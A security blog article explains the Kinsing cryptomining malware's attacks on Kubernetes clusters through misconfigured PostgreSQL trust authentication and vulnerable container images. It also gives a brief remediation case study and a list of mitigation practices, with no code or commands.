Kubernetes Clusters Hacked: What You Need To Know
Contents
Summary Of The Attack
- Kinsing malware targeting Kubernetes Clusters.
- Two paths of exploitation were utilized: vulnerable images and misconfigured PostgreSQL servers.
- The why of the attack is crypto mining and generating revenue.
- Securing Kubernetes clusters is a tedious job that has to be done.
Stay Up-To-Date On The Latest Attacks
Be the first to know when our experts release new insights on the top attacks.
You're on the list! Just one more step...
Check your email to confirm your subscription.
What Happened?
In order to get early access to Kubernetes setups, the threat actors behind the Kinsing Crypto Jacking operation have been seen taking advantage of unprotected and improperly configured PostgreSQL servers.
What Is Kinsing?
Kinsing is malware written in Golang, which is a high level programming language used for creating cloud native applications.
It is compiled using the Go 1.13.6 version.
This malware generally targets Linux environments mainly for cryptocurrency mining. Once installed on the victim’s environment and starts successfully running on the target, the goal becomes invading other PCs.
The Anatomy Of The Attack
The security researchers at Microsoft analyzed the attack and identified two attack paths were used.
The first attack path is establishing and enumerating the PostgreSQL servers that had configuration issues.
From there one of the most common misconfigurations that were being exploited is the “trust authentication” setting which allows PostgreSQL to make an assumption that any connection that is established towards the server is authorized to get database access.
In addition, if a security issue exists such that a broad range of IP addresses are being assigned then any IP address that the attacker may be using can be used to gain access to the server.
The second attack path is trying to exploit a security flaw in container images. In this particular scenario, the attackers are searching for a remote code execution vulnerability which will then allow them to push their payload and gain access to the server in that manner.
From what has been seen so far, the attackers are trying to find and exploit security flaws in these applications:
- WordPress
- Liferay
- PHPUnit
- Oracle WebLogic
Free Security Policy Templates
Get a step ahead of your cybersecurity goals with our comprehensive templates.
Why Kinsing Malware?
The Kinsing malware already has a well full archive of exploiting containerized environments to mine cryptocurrencies. The main goal is to generate revenue for the threat actors by exploiting the victim server’s hardware resources.
Kinsing On PostgreSQL: Case Study
When researching this topic Sreeram Venkitesh came to mind. He elaborated on how he detected Kinsing and what he did to remove it from the server.
The lessons learned start with the indicators of compromise being suddenly shut down off the PostgreSQL database. Without any particular reason, the CPU cores were at 100% usage, and suddenly he couldn’t access the PostgreSQL.
The next step was process review where he detected Kinsing as the name of a process but figured out that it can’t be removed as it adds a cron job for self-replication.
The last part involved finding all processes and deleting them from the /tmp directory as well as deleting the cron jobs running.
This represents a case of successful Kinsing remediation.
How Can This Attack Be Prevented?
When it comes to mitigating the exploit path following the misconfigured SQL Servers, the best security practices include:
- Removing trust authentication
- Hardening the network access to the database
- Removing default users and extensive permissions
On the other hand, securing the container images should include:
- Using known registries for container’s images.
- Scanning images for vulnerabilities regularly and keeping them all up to date.
- Hardening the network access to the system.
- Timely patching of services so vulnerable versions do not exist on your system.
In Kubernetes official documentation, they offer an extremely well written guide on protecting Kubernetes clusters.
Article by
Share This Article
Our Editorial Process
Our content goes through a rigorous approval process which is reviewed by cybersecurity experts – ensuring the quality and accuracy of information published.
Categories